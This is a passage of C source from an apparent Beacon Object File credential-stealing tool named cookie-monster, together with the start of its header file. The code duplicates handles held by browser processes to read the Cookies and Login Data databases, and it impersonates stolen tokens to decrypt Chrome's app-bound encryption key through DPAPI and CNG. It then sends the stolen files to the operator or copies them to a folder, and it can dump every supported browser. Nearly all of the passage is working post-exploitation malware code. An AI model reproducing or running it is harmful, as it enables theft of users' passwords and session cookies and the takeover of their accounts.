    if(status == STATUS_INFO_LENGTH_MISMATCH)
    {
        dwSize = dwNeeded;
        SYSTEM_HANDLE_INFORMATION_EX *shi_new = (SYSTEM_HANDLE_INFORMATION_EX*) KERNEL32$GlobalReAlloc(shi, dwSize, GMEM_MOVEABLE);

        if (shi_new == NULL) {
            BeaconPrintf(CALLBACK_ERROR, "Failed to reallocate memory...\n");
            KERNEL32$GlobalFree(shi);
            return FALSE;
        }
        shi = shi_new;
    }
    status = NTDLL$NtQuerySystemInformation(SystemHandleInformationEx, shi, dwSize, &dwNeeded);
    if(status != 0)
    {
        BeaconPrintf(CALLBACK_ERROR,"NtQuerySystemInformation failed with status 0x%x.\n",status);
        KERNEL32$GlobalFree(shi);
        return FALSE;
    }
    //BeaconPrintf(CALLBACK_OUTPUT,"Handle Count %d\n", shi->NumberOfHandles);
    //iterate through each handle and find our PID and a handle to a file
    for(DWORD i = 0; i < shi->NumberOfHandles; i++) {
        SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX handle = shi->Handles[i];
        if ((DWORD)(ULONG_PTR)handle.UniqueProcessId != PID) {
            continue;
        }
        //BeaconPrintf(CALLBACK_OUTPUT, "Found PID");
        if (handle.GrantedAccess == 0x001a019f) continue;
        if (handle.HandleAttributes == 0x2 && handle.GrantedAccess == 0x0012019f) continue;

        // reset per every iteration
        if (objectNameInfo) { MSVCRT$free(objectNameInfo); objectNameInfo = NULL; }
        if (objectTypeInfo) { MSVCRT$free(objectTypeInfo); objectTypeInfo = NULL; }
        if (hDuplicate) { KERNEL32$CloseHandle(hDuplicate); hDuplicate = NULL; }
        if (hProc) { KERNEL32$CloseHandle(hProc); hProc = NULL; }
        if (buffer) { KERNEL32$GlobalFree(buffer); buffer = NULL; }

        objectNameInfo = (POBJECT_NAME_INFORMATION)MSVCRT$malloc(0x1000);
        objectTypeInfo = (PPUBLIC_OBJECT_TYPE_INFORMATION)MSVCRT$malloc(0x1000);
        if (!objectNameInfo || !objectTypeInfo) {
            BeaconPrintf(CALLBACK_ERROR, "malloc failed\n");
            if (objectNameInfo) MSVCRT$free(objectNameInfo);
            if (objectTypeInfo) MSVCRT$free(objectTypeInfo);
            continue;
        }

        hProc = KERNEL32$OpenProcess(PROCESS_DUP_HANDLE, FALSE, PID);
        if (hProc == INVALID_HANDLE_VALUE) {
            BeaconPrintf(CALLBACK_ERROR, "OpenProcess failed %d\n", KERNEL32$GetLastError());
            continue;
        }

        if (!KERNEL32$DuplicateHandle(hProc, (HANDLE)(intptr_t)handle.HandleValue, (HANDLE)-1, &hDuplicate, 0, FALSE, DUPLICATE_SAME_ACCESS)) {
            //BeaconPrintf(CALLBACK_ERROR,"DuplicateHandle failed %d\n", KERNEL32$GetLastError());
            continue;
        }

        //Check if the handle exists on disk, otherwise the program will hang
        if (KERNEL32$GetFileType(hDuplicate) != FILE_TYPE_DISK) {
            //BeaconPrintf(CALLBACK_ERROR, "NOT A FILE");
            continue;
        }

        ULONG returnLength = 0;
        //BeaconPrintf(CALLBACK_OUTPUT,"Duplicated Handle, confirmed file on disk");
        status = NTDLL$NtQueryObject(hDuplicate, ObjectNameInformation, objectNameInfo, 0x1000, &returnLength);
        if (status != 0) {
            BeaconPrintf(CALLBACK_ERROR,"Failed NtQueryObject");
            continue;
        }

        if (objectNameInfo->Name.Length == 0) {
            continue;
        }

        char handleName[1024];
        MSVCRT$sprintf(handleName, "%.*ws", objectNameInfo->Name.Length / sizeof(WCHAR), objectNameInfo->Name.Buffer);

        status = NTDLL$NtQueryObject(hDuplicate, ObjectTypeInformation, objectTypeInfo, 0x1000, &returnLength);
        if (status != 0) {

            BeaconPrintf(CALLBACK_ERROR,"Failed NtQueryObject");
            continue;
        }

        // extract type name properly
        UNICODE_STRING *typeStr = &objectTypeInfo->TypeName;
        WCHAR typeName[256] = {0};
        int len = min(typeStr->Length / sizeof(WCHAR), 255);
        MSVCRT$wcsncpy(typeName, typeStr->Buffer, len);
        typeName[len] = L'\0'; // null terminated

        if (MSVCRT$_wcsicmp(typeName, L"File") != 0) {
            continue;
        }
        //BeaconPrintf(CALLBACK_OUTPUT, "%s\n", handleName);
        //BeaconPrintf(CALLBACK_OUTPUT, "%d\n", MSVCRT$strlen(handleName));

        // Check filename
        if (MSVCRT$strstr(handleName, browserFile) != NULL) {
            size_t nameLen = MSVCRT$strlen(handleName);
            const char *ext7 = (nameLen >= 7) ? &handleName[nameLen - 7] : "";
            const char *ext4 = (nameLen >= 4) ? &handleName[nameLen - 4] : "";

            if (MSVCRT$strcmp(ext7, "Cookies") == 0 || MSVCRT$strcmp(ext4, "Data") == 0) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] Handle to %s Was FOUND with PID: %lu\n", browserFile, PID);
                //BeaconPrintf(CALLBACK_OUTPUT, "Handle Name: %.*ws\n", objectNameInfo->Name.Length / sizeof(WCHAR), objectNameInfo->Name.Buffer);

                KERNEL32$SetFilePointer(hDuplicate, 0, 0, FILE_BEGIN);
                DWORD dwFileSize = KERNEL32$GetFileSize(hDuplicate, NULL);
                BeaconPrintf(CALLBACK_OUTPUT, "[+] file size is %d\n", dwFileSize);

                buffer = (CHAR*)KERNEL32$GlobalAlloc(GPTR, dwFileSize);
                if (!buffer) {
                    BeaconPrintf(CALLBACK_ERROR, "Failed to allocate buffer\n");
                    continue;
                }

                DWORD dwRead = 0;
                // check if readfile failed
                if (!KERNEL32$ReadFile(hDuplicate, buffer, dwFileSize, &dwRead, NULL)) {
                    BeaconPrintf(CALLBACK_ERROR, "ReadFile failed\n");
                    KERNEL32$GlobalFree(buffer);
                    buffer = NULL;
                    continue;
                }

                //if folder path is not null, then copy to folder instead of download_file()
                if (MSVCRT$strcmp(folderPath, "") != 0) {
                    CHAR copyFilePath[MAX_PATH];
                    MSVCRT$sprintf(copyFilePath, "%s\\%s", folderPath, downloadFileName);
                    HANDLE hFile = KERNEL32$CreateFileA(copyFilePath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

                    if (hFile != INVALID_HANDLE_VALUE) {
                        DWORD written = 0;
                        KERNEL32$WriteFile(hFile, buffer, dwFileSize, &written, NULL);
                        BeaconPrintf(CALLBACK_OUTPUT, "[+] Wrote password file to: %s\n", copyFilePath);
                        KERNEL32$CloseHandle(hFile);
                    } else {
                        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to write password file to %s\n", copyFilePath);
                    }
                } else {
                    download_file(downloadFileName, buffer, dwFileSize);
                }

                result = TRUE;
                goto cleanup_and_exit;
            }
        }
    }

cleanup_and_exit:
    //  clean up and free everything
    if (buffer) KERNEL32$GlobalFree(buffer);
    if (hDuplicate) KERNEL32$CloseHandle(hDuplicate);
    if (hProc) KERNEL32$CloseHandle(hProc);
    if (objectNameInfo) MSVCRT$free(objectNameInfo);
    if (objectTypeInfo) MSVCRT$free(objectTypeInfo);
    if (shi) KERNEL32$GlobalFree(shi);

    return result;
}

// nanodump fileless download
BOOL download_file( IN LPCSTR fileName, IN char fileData[], IN ULONG32 fileLength)
{
    AxDownloadMemory(fileName, fileData, fileLength);
    BeaconPrintf(CALLBACK_OUTPUT,"[+] The file was downloaded filessly");
    return TRUE;
}

// Helper functions for string operations - Chrome style
BOOL PopFromStringFront(BYTE** data, DWORD* data_len, DWORD pop_len, BYTE* output) {
    // Check if we have enough data
    if (*data_len < pop_len) {
        return FALSE;
    }

    // Copy the data if output buffer is provided
    if (output != NULL) {
        MSVCRT$memcpy(output, *data, pop_len);
    }

    // Move the pointer forward
    *data += pop_len;
    *data_len -= pop_len;

    return TRUE;
}

BOOL PopDWORDFromStringFront(BYTE** data, DWORD* data_len, DWORD* output) {
    if (*data_len < sizeof(DWORD)) {
        return FALSE;
    }

    if (output != NULL) {
        *output = *((DWORD*)*data);
    }

    *data += sizeof(DWORD);
    *data_len -= sizeof(DWORD);

    return TRUE;
}

BYTE* decrypt_with_cng(const BYTE* input_data, DWORD input_size, DWORD* output_size) {
    NCRYPT_PROV_HANDLE hProvider = 0;
    NCRYPT_KEY_HANDLE hKey = 0;
    BYTE* output_buffer = NULL;
    DWORD buffer_size = 0;
    SECURITY_STATUS status;

    // Initialize output size
    *output_size = 0;

    // Open storage provider
    LPCWSTR provider_name = L"Microsoft Software Key Storage Provider";
    status = NCRYPT$NCryptOpenStorageProvider(&hProvider, provider_name, 0);
    if (status != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR,"[!] NCryptOpenStorageProvider failed with status 0x%08X\n", status);
        return NULL;
    }

    // Open key
    LPCWSTR key_name = L"Google Chromekey1";
    status = NCRYPT$NCryptOpenKey(hProvider, &hKey, key_name, 0, 0);
    if (status != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR,"[!] NCryptOpenKey failed with status 0x%08X\n", status);
        NCRYPT$NCryptFreeObject(hProvider);
        return NULL;
    }

    // First call to get required buffer size
    status = NCRYPT$NCryptDecrypt(
        hKey,
        (PBYTE)input_data,
        input_size,
        NULL,                    // pPaddingInfo
        NULL,                    // pbOutput (NULL to get size)
        0,                       // cbOutput
        &buffer_size,            // pcbResult
        NCRYPT_SILENT_FLAG       // dwFlags (0x40)
    );

    if (status != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR,"[!] 1st NCryptDecrypt failed with status 0x%08X\n", status);
        NCRYPT$NCryptFreeObject(hKey);
        NCRYPT$NCryptFreeObject(hProvider);
        return NULL;
    }

    // Allocate output buffer
    output_buffer = (BYTE*)MSVCRT$malloc(buffer_size);
    if (!output_buffer) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Memory allocation failed\n");
        NCRYPT$NCryptFreeObject(hKey);
        NCRYPT$NCryptFreeObject(hProvider);
        return NULL;
    }

    // Second call to actually decrypt
    status = NCRYPT$NCryptDecrypt(
        hKey,
        (PBYTE)input_data,
        input_size,
        NULL,                    // pPaddingInfo
        output_buffer,           // pbOutput
        buffer_size,             // cbOutput
        &buffer_size,            // pcbResult (actual bytes written)
        NCRYPT_SILENT_FLAG       // dwFlags (0x40)
    );

    if (status != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR,"[!] 2nd NCryptDecrypt failed with status 0x%08X\n", status);
        MSVCRT$free(output_buffer);
        output_buffer = NULL;
        buffer_size = 0;
    }

    // Clean up
    NCRYPT$NCryptFreeObject(hKey);
    NCRYPT$NCryptFreeObject(hProvider);

    // Set output size
    *output_size = buffer_size;

    return output_buffer;
}

// Steal Token and impersonate user.
BOOL StealAndImpersonate(int pid) {
    HANDLE hProcess, hToken, hUser;
    hProcess = KERNEL32$OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
    if (hProcess == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to open process: %lu\n", KERNEL32$GetLastError());
        return FALSE;
    }

    if (!ADVAPI32$OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to open process token: %lu\n", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hProcess);
        return FALSE;
    }

    if (!ADVAPI32$DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS,NULL, SecurityImpersonation, TokenPrimary, &hUser)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to duplicate token: %lu\n", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hToken);
        KERNEL32$CloseHandle(hProcess);
        return FALSE;
    }

    if (!ADVAPI32$ImpersonateLoggedOnUser(hUser)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to impersonate user: %lu\n", KERNEL32$GetLastError());
        KERNEL32$CloseHandle(hToken);
        KERNEL32$CloseHandle(hProcess);
        return FALSE;
    }

//    BeaconPrintf(CALLBACK_OUTPUT,"[+] Successfully impersonated user with PID: %d\n", pid);
    return TRUE;
}

BOOL AppBoundDecryptor(char * localStateFile, int pid){
    //BeaconPrintf(CALLBACK_OUTPUT, "Got Local State File");
    // extract CHAR pattern[] = "\"encrypted_key\":\""; from file
    DWORD app_data_size = 0;
    char* app_data = GetFileContent(localStateFile, &app_data_size);
    if(app_data == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Reading the file failed.\n");
        return FALSE;
    }
    CHAR pattern[] = "\"encrypted_key\":\"";
    char* v10_key = ExtractKey(app_data, pattern);

    CHAR app_pattern[] =  "\"app_bound_encrypted_key\":\"";
    char* app_key = ExtractKey(app_data, app_pattern);

//    BeaconPrintf(CALLBACK_OUTPUT,"[+] Extracted Encrypted Key %s\n", v10_key);
//    BeaconPrintf(CALLBACK_OUTPUT,"[+] Extracted Encrypt Appboundkey %s\n", app_key);

    if (v10_key != NULL) {
        // Decrypt V10 Encryption Key
        // todo store token
        if (StealAndImpersonate(pid)) {
            GetMasterKey(v10_key);
            ADVAPI32$RevertToSelf();
        } else {
            return FALSE;
        }
    }

    if (app_key == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Error Encrypt Appboundkey is null\n");
        return FALSE;
    }

    // Base64 decode the app_bound_encrypted_key
    size_t encrypted_key_len;
    uint8_t* encrypted_key_with_header = Base64Decode(app_key, &encrypted_key_len);
    if (encrypted_key_with_header == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to base64 decode the key\n");
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    // Validate key prefix (APPB)
    if (encrypted_key_len < sizeof(kCryptAppBoundKeyPrefix) || MSVCRT$memcmp(encrypted_key_with_header, kCryptAppBoundKeyPrefix, sizeof(kCryptAppBoundKeyPrefix)) != 0) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Invalid key header - expected 'APPB' prefix\n");
        MSVCRT$free(encrypted_key_with_header);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    // Strip prefix
    uint8_t* encrypted_key = (uint8_t*)MSVCRT$malloc(encrypted_key_len - sizeof(kCryptAppBoundKeyPrefix));
    if (encrypted_key == NULL) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to allocate memory for encrypted key\n");
        MSVCRT$free(encrypted_key_with_header);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    MSVCRT$memcpy(encrypted_key, encrypted_key_with_header + sizeof(kCryptAppBoundKeyPrefix), encrypted_key_len - sizeof(kCryptAppBoundKeyPrefix));
    encrypted_key_len -= sizeof(kCryptAppBoundKeyPrefix);
    MSVCRT$free(encrypted_key_with_header);

    // First, attempt to decrypt as SYSTEM
//    BeaconPrintf(CALLBACK_OUTPUT,"[+] Attempting to decrypt key as SYSTEM...\n");

    BYTE* decrypted_key = NULL;
    DWORD decrypted_key_len = 0;

    DATA_BLOB encrypted_blob;
    DATA_BLOB intermediate_blob;
    DATA_BLOB decrypted_blob;

    encrypted_blob.pbData = encrypted_key;
    encrypted_blob.cbData = encrypted_key_len;
    HANDLE hUser = NULL;
    HANDLE hToken = NULL;
    HANDLE hProcess = NULL;

    BOOL result = CRYPT32$CryptUnprotectData(&encrypted_blob, NULL, NULL, NULL, NULL, 0, &intermediate_blob);
    if (result) {
//        BeaconPrintf(CALLBACK_OUTPUT,"[+] Attempting to impersonate user to decrypt...\n");

        // Impersonate the user
        hProcess = KERNEL32$OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
        if (hProcess == NULL) {
            BeaconPrintf(CALLBACK_ERROR,"[!] Failed to open process: %lu\n", KERNEL32$GetLastError());
            MSVCRT$free(encrypted_key);
            KERNEL32$GlobalFree(app_data);
            KERNEL32$GlobalFree(app_key);
            return FALSE;
        }

        if (!ADVAPI32$OpenProcessToken(hProcess, TOKEN_QUERY | TOKEN_DUPLICATE, &hToken)) {
            BeaconPrintf(CALLBACK_ERROR,"[!] Failed to open process token: %lu\n", KERNEL32$GetLastError());
            KERNEL32$CloseHandle(hProcess);
            MSVCRT$free(encrypted_key);
            KERNEL32$GlobalFree(app_data);
            KERNEL32$GlobalFree(app_key);
            return FALSE;
        }

        if (!ADVAPI32$DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS,NULL, SecurityImpersonation, TokenPrimary, &hUser)) {
            BeaconPrintf(CALLBACK_ERROR,"[!] Failed to duplicate token: %lu\n", KERNEL32$GetLastError());
            KERNEL32$CloseHandle(hToken);
            KERNEL32$CloseHandle(hProcess);
            MSVCRT$free(encrypted_key);
            KERNEL32$GlobalFree(app_data);
            KERNEL32$GlobalFree(app_key);
            return FALSE;
        }

        // ToDo store token;
        if (!ADVAPI32$ImpersonateLoggedOnUser(hUser)) {
            BeaconPrintf(CALLBACK_ERROR,"[!] Failed to impersonate user: %lu\n", KERNEL32$GetLastError());
            KERNEL32$CloseHandle(hToken);
            KERNEL32$CloseHandle(hProcess);
            KERNEL32$CloseHandle(hUser);
            MSVCRT$free(encrypted_key);
            KERNEL32$GlobalFree(app_data);
            KERNEL32$GlobalFree(app_key);
            return FALSE;
        }

//        BeaconPrintf(CALLBACK_OUTPUT,"[!] Successfully impersonated user with PID: %d\n", pid);

        // Now try to decrypt as impersonated user
        result = CRYPT32$CryptUnprotectData(&intermediate_blob, NULL, NULL, NULL, NULL, 0, &decrypted_blob);
        if (!result) {
            BeaconPrintf(CALLBACK_ERROR,"[!] Decrypting as impersonated user failed: %lu\n", KERNEL32$GetLastError());
            ADVAPI32$RevertToSelf();
            KERNEL32$CloseHandle(hToken);
            KERNEL32$CloseHandle(hProcess);
            KERNEL32$CloseHandle(hUser);
            MSVCRT$free(encrypted_key);
            KERNEL32$GlobalFree(app_data);
            KERNEL32$GlobalFree(app_key);
            return FALSE;
        }

//        BeaconPrintf(CALLBACK_OUTPUT,"[!] Successfully decrypted key as impersonated user!\n");
    } else {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to decrypt key as SYSTEM!\n");
        MSVCRT$free(encrypted_key);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    // Revert impersonation
    if (hUser != NULL) {
        ADVAPI32$RevertToSelf();
        KERNEL32$CloseHandle(hToken);
        KERNEL32$CloseHandle(hProcess);
        KERNEL32$CloseHandle(hUser);
//        BeaconPrintf(CALLBACK_OUTPUT,"[+] Rev2Self\n");
    }

    // Parse the decrypted data - Chrome format
    BYTE* cursor = decrypted_blob.pbData;
    DWORD remaining = decrypted_blob.cbData;
    DWORD validation_len = 0;

    // Get validation string length
    if (!PopDWORDFromStringFront(&cursor, &remaining, &validation_len)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to read validation length.\n");
        KERNEL32$LocalFree(decrypted_blob.pbData);
        MSVCRT$free(encrypted_key);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    if (validation_len > remaining) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Validation length (%lu) exceeds remaining data (%lu).\n", validation_len, remaining);
        KERNEL32$LocalFree(decrypted_blob.pbData);
        MSVCRT$free(encrypted_key);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    // Get validation string
    BYTE* validation_blob = cursor;
    if (!PopFromStringFront(&cursor, &remaining, validation_len, NULL)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to extract validation blob.\n");
        KERNEL32$LocalFree(decrypted_blob.pbData);
        MSVCRT$free(encrypted_key);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    // Get key length
    DWORD key_len = 0;
    if (!PopDWORDFromStringFront(&cursor, &remaining, &key_len)) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Failed to read key length.\n");
        KERNEL32$LocalFree(decrypted_blob.pbData);
        MSVCRT$free(encrypted_key);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    if (key_len > remaining) {
        BeaconPrintf(CALLBACK_ERROR,"[!] Key length (%lu) exceeds remaining data (%lu).\n", key_len, remaining);
        KERNEL32$LocalFree(decrypted_blob.pbData);
        MSVCRT$free(encrypted_key);
        KERNEL32$GlobalFree(app_data);
        KERNEL32$GlobalFree(app_key);
        return FALSE;
    }

    // Get key blob
    BYTE* key_blob = cursor;

    // if first byte is 03 then decyrpt with CNG
    if (key_blob[0] == 0x03) {
//            BeaconPrintf(CALLBACK_OUTPUT,"[+] Decrypting key with CNG...");
        BYTE* aes_encrypted_key = key_blob + 1;
        DWORD cng_out_len = 0;
        BYTE *decrypted = decrypt_with_cng(aes_encrypted_key, 32, &cng_out_len);
        if (decrypted) {
            CHAR *chromeOutput = (CHAR*)KERNEL32$GlobalAlloc(GPTR, (cng_out_len * 4) + 1);
            if (!chromeOutput) {
                MSVCRT$free(decrypted);
                return FALSE;
            }

//          BeaconPrintf(CALLBACK_OUTPUT,"[+] CNG Decryption Output (%lu bytes):\n", cng_out_len);
            int offset = 0;
            for (DWORD i = 0; i < cng_out_len; i++) {
                int written = MSVCRT$_snprintf(chromeOutput + offset, (cng_out_len * 4) + 1 - offset, "\\x%02x", decrypted[i]);
                if (written < 0 || written >= (int)((cng_out_len * 4) + 1 - offset)) {
                    BeaconPrintf(CALLBACK_ERROR, "[!] Buffer overflow in hex encoding\n");
                    KERNEL32$GlobalFree(chromeOutput);
                    MSVCRT$free(decrypted);
                    return FALSE;
                }
                offset += written;
            }

            BeaconPrintf(CALLBACK_OUTPUT,"[+] -> Chrome AES Key: %s \n", chromeOutput);
            MSVCRT$free(decrypted);
            KERNEL32$GlobalFree(chromeOutput);
        } else {
            BeaconPrintf(CALLBACK_ERROR,"[!] CNG decryption failed.\n");
        }
    }
    CHAR *output = (CHAR*)KERNEL32$GlobalAlloc(GPTR, (key_len * 4) + 1);

    for (DWORD i = 0; i < key_len; i++) {
        MSVCRT$sprintf(output, "%s\\x%02x", output, key_blob[i]);
    }

    BeaconPrintf(CALLBACK_OUTPUT,"[+] -> Encrypted App Bound Key: %s \n", output );

    // Clean up
    KERNEL32$LocalFree(decrypted_blob.pbData);
    KERNEL32$LocalFree(intermediate_blob.pbData);
    MSVCRT$free(encrypted_key);
    KERNEL32$GlobalFree(app_data);
    KERNEL32$GlobalFree(app_key);
    KERNEL32$GlobalFree(output);

    return TRUE;
}

BOOL isBrowserSupported(char* browser) {
    for (int i = 0; i < sizeof(supported_browsers) / sizeof(supported_browsers[0]); i++) {
        if (MSVCRT$strcmp(browser, supported_browsers[i]) == 0) {
            return TRUE;
        }
    }
    return FALSE;
}

BOOL ConstructDbPath(char* dest, size_t dest_size, const char* browser, const char* type) {
    if (!dest || !browser || !type || dest_size < 1) {
        return FALSE;
    }
    int result = MSVCRT$_snprintf(dest, dest_size, "%s%s.db", browser, type);
    if (result < 0 || (size_t)result >= dest_size) {
        dest[dest_size - 1] = '\0';
        return FALSE;
    }
    return TRUE;
}

VOID go(char *buf, int len) {
    //parse command line arguements
    datap parser;
    char* browser = "";
    char* browser_path = "";
    char* copyFile = "";
    int browser_pid, cookie_pid, password_pid;
    BOOL cookies, passwords, keys;

    BeaconDataParse(&parser, buf, len);
    browser = BeaconDataExtract(&parser, NULL);
    browser_path = BeaconDataExtract(&parser, NULL);
    browser_pid = BeaconDataInt(&parser);
    cookies = BeaconDataInt(&parser);
    passwords = BeaconDataInt(&parser);
    keys = BeaconDataInt(&parser);
    cookie_pid = BeaconDataInt(&parser);
    password_pid = BeaconDataInt(&parser);
    BOOL AllBrowsers = FALSE;

    if (cookie_pid != 0 || password_pid != 0) {
        if (MSVCRT$strlen(browser) == 0) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Please specify which browser to use (chrome or msedge)\n");
            return;
        }
        if (!isBrowserSupported(browser)) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Browser %s is currently not supported, if its chromium based try browser path\n", browser);
            return;
        }
        char dbCookies[20];
        char dbPasswords[20];
        if (!ConstructDbPath(dbCookies, sizeof(dbCookies), browser, "Cookies") ||
            !ConstructDbPath(dbPasswords, sizeof(dbPasswords), browser, "Passwords")) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Failed to construct database paths");
            return;
        }
        if (keys && passwords && cookies) {
            GetEncryptionKey(browser);
            GetBrowserFile(password_pid, "Login Data", dbPasswords, copyFile);
            GetBrowserFile(cookie_pid, "Cookies", dbCookies, copyFile);
            return;
        }
        //if cookie or login data only or keys, then get the cookies and/or passwords and exit
        if (keys){
            GetEncryptionKey(browser);
            return;
        } else if (passwords) {
            GetBrowserFile(password_pid, "Login Data", dbPasswords, copyFile);
            return;
        } else {
            GetBrowserFile(cookie_pid, "Cookies", dbCookies, copyFile);
            return;
        }
    }

    if (MSVCRT$strlen(browser) == 0) {
        if (browser_path != NULL && MSVCRT$strlen(browser_path) > 0) {
            if (browser_pid == 0) {
                BeaconPrintf(CALLBACK_ERROR, "[!] Browser Pid is require for Impersonation");
                return;
            }
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Using browser path: %s and pid %d", browser_path, browser_pid);
            //if key only, then get the key and exit
            if (keys) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] KEY ONLY SELECTED");
                AppBoundDecryptor(browser_path, browser_pid);
                return;
            }

            char* browser = NULL;
            if (SHLWAPI$StrStrIA(browser_path, "chrome") != NULL) {
                browser = "chrome";
            } else if (SHLWAPI$StrStrIA(browser_path, "edge") != NULL) {
                browser = "edge";
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "Browser not supported ;(");
                return;
            }
            //if cookie or login data only, then get the cookies and/or passwords and exit
            if (cookies || passwords) {
                BeaconPrintf(CALLBACK_OUTPUT, "[+] COOKIES/PASSWORDS ONLY SELECTED");
                GetBrowserData(browser, cookies, passwords, copyFile);
                return;
            }
            // Get All
            AppBoundDecryptor(browser_path, browser_pid);
            GetBrowserData(browser, cookies, passwords, copyFile);
            return;

        }

        BeaconPrintf(CALLBACK_OUTPUT, "[+] Dumping all supported browsers");
        for (int i = 0; i < sizeof(supported_browsers) / sizeof(supported_browsers[0]); i++) {
            browser = supported_browsers[i];
            BeaconPrintf(CALLBACK_OUTPUT, "===== Going for browser %s =====", browser);
            if (MSVCRT$strcmp(browser, "firefox") == 0){
                GetFirefoxInfo();
                continue;
            }
            GetEncryptionKey(browser);
            GetBrowserData(browser, cookies, passwords, copyFile);
        }
    } else {
        if (!isBrowserSupported(browser)) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Browser %s is currently not supported, if its chromium based try browser path\n", browser);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "===== Going for browser %s =====", browser);
        // Firefox Only
        if (MSVCRT$strcmp(browser, "firefox") == 0){
            GetFirefoxInfo();
            return;
        }

        // Get Key Only
        if (keys){
            BeaconPrintf(CALLBACK_OUTPUT, "[+] KEY ONLY SELECTED");
            GetEncryptionKey(browser);
            return;
        }
        // Get Login/Cookie (Without Decryption)
        if (cookies || passwords){
            BeaconPrintf(CALLBACK_OUTPUT, "[+] COOKIES/PASSWORDS ONLY SELECTED");
            GetBrowserData(browser, cookies, passwords, copyFile);
            return;
        }
        // Get All
        GetEncryptionKey(browser);
        GetBrowserData(browser, cookies, passwords, copyFile);
    }
}

================================================
FILE: Creds-BOF/cookie-monster/cookie-monster-bof.h
================================================
#include <windows.h>

#define SystemHandleInformation 0x10
#define HANDLE_TYPE_FILE 37
#define STATUS_INFO_LENGTH_MISMATCH 0xc0000004

//nanodump fileless download
#define CALLBACK_FILE       0x02
#define CALLBACK_FILE_WRITE 0x08
#define CALLBACK_FILE_CLOSE 0x09
// chunk size used in download_file: 900 KiB
#define CHUNK_SIZE 0xe1000


typedef struct _SYSTEM_HANDLE
{
	ULONG ProcessId;
	UCHAR ObjectTypeNumber;
	UCHAR Flags;
	USHORT Handle;
	PVOID Object;
	ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, SYSTEM_HANDLE_INFORMATION_, * PSYSTEM_HANDLE_INFORMATION_;

typedef struct _SYSTEM_HANDLE_INFORMATION {
    ULONG NumberOfHandles;
    SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
    PVOID Object;
    HANDLE UniqueProcessId;
    HANDLE HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

typedef struct __PUBLIC_OBJECT_TYPE_INFORMATION
{
    UNICODE_STRING TypeName;
    ULONG Reserved [22];    // reserved for internal use
} PUBLIC_OBJECT_TYPE_INFORMATION, *PPUBLIC_OBJECT_TYPE_INFORMATION;

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation,
    SystemHandleInformationEx = 64 // This may differ based on Windows version
} SYSTEM_INFORMATION_CLASS;

typedef enum _OBJECT_INFORMATION_CLASS
{
	ObjectBasicInformation,
	ObjectNameInformation,
	ObjectTypeInformation,
	ObjectAllInformation,
	ObjectDataInformation
